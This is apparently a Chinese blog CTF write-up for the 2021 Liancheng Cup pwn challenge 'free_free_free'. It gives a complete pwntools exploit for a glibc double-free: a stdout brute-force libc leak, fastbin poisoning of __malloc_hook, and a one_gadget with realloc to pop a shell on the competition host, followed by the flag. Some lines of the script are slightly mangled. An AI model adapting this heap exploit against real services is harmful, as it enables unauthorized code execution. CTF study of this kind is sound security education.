2021年“莲城杯”网络安全大赛-PWN-free_free_free

这篇博客介绍了如何通过解决'free_free_free'挑战中的doublefree漏洞,利用Python实现内存操纵,最终获取远程靶机的shell。解题步骤包括理解保护机制、定位漏洞、构造payload并利用gadgets。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2021年“莲城杯”网络安全大赛-PWN-free_free_free

题目名称:free_free_free
题目内容:你一定很擅长free吧。靶机:nc 183.129.189.60 10023
题目分值:300.0
题目难度:中等
相关附件:free_free_free的附件.zip

解题思路:

1.保护机制,本地libc与远程一样,就没必要加载附件那个

在这里插入图片描述

2.漏洞点 - double free

在这里插入图片描述

3.要爆破stdout,1/16的可能,stdout-0x43有7f的size,malloc_hook-0x23有7f的size,fastbin 伪造size,reallo调节栈帧,exp中没写循环,多执行几次。

#!/usr/bin/env python from pwn import *

local = 0
debug = 0
binary = "./free_free_free"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"


if local:
	# p = process(binary) libc = ELF(lib)
else :
	# p = remote("183.129.189.60","10023")
	# lib = "./libc.so.6" 
	libc = ELF(lib)

s	= lambda buf	: p.send(buf)
sl	= lambda buf	: p.sendline(buf)
sa	= lambda delim, buf : p.sendafter(delim, buf)
sal	= lambda delim, buf : p.sendlineafter(delim, buf) 
sh	= lambda	: p.interactive()
r	= lambda n=None	: p.recv(n)
ru	= lambda delim	: p.recvuntil(delim)
r7f	= lambda	: u64(p.recvuntil("\x7f")[-6:]+"\x00\x00") 
trs	= lambda addr	: libc.address+addr
gadget = lambda ins	: libc.search(asm(ins,arch="amd64")).next() 
tohex	= lambda buf	: "".join("\\x%02x"%ord(_) for _ in buf)

def add(size,content): 
	sal("> ","1")
	sal("size> ",str(size)) 
	sa("message> ",content)
def free(id):
	sal("> ","2")
	sal("idx> ",str(id)) 
def pwn():
	add(0x78+1,"0"*8)
	add(0x60,"1"*8)
	add(0x60,"2"*8) 
	free(0) 
	add(0x18,"3"*8) 
	add(0x60,"\xdd\x65") 
	free(2)
	free(1) 
	free(2)
	add(0x60,chr(0x20)) 
	add(0x60,"tmp")
	add(0x60,"tmp") 
	# raw_input() 
	add(0x60,"tmp") 
	payload = ""
	payload += chr(0)*(0x33) 
	payload += p64(0xfbad3887) 	
	payload += p64(0)*3
	payload += "\x88"	#_chain filed 
	add(0x68,payload)

	libc.address = r7f()-libc.sym["_IO_2_1_stdin_"] 	
	info("libc basse => 0x%x"%libc.address)

	ogg = [trs(_) for _ in(0x45226,0x4527a,0xf03a4,0xf1247)] 
	og	= ogg[1]
	free(2) 
	free(1) 
	free(2)
	add(0x60,p64(libc.sym[" malloc_hook"]-0x23)) 		
	add(0x60,"tmp")
	add(0x60,"tmp") 
	payload = ""
	payload += chr(0)*(0x13-8) 
	payload += p64(og)
	payload += p64(libc.sym["realloc"]+16) 	
	add(0x68,payload)
	sl("1")
	sl("17")
while	True: 
	try:
		# p = process(binary)
		p = remote("183.129.189.60","10023")
		pwn() 
		break
	except:
		p.close() 
raw_input("[*] get shell") 
sh()
# DASCTF{7a95efe41004077a790d234f5b90c343}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值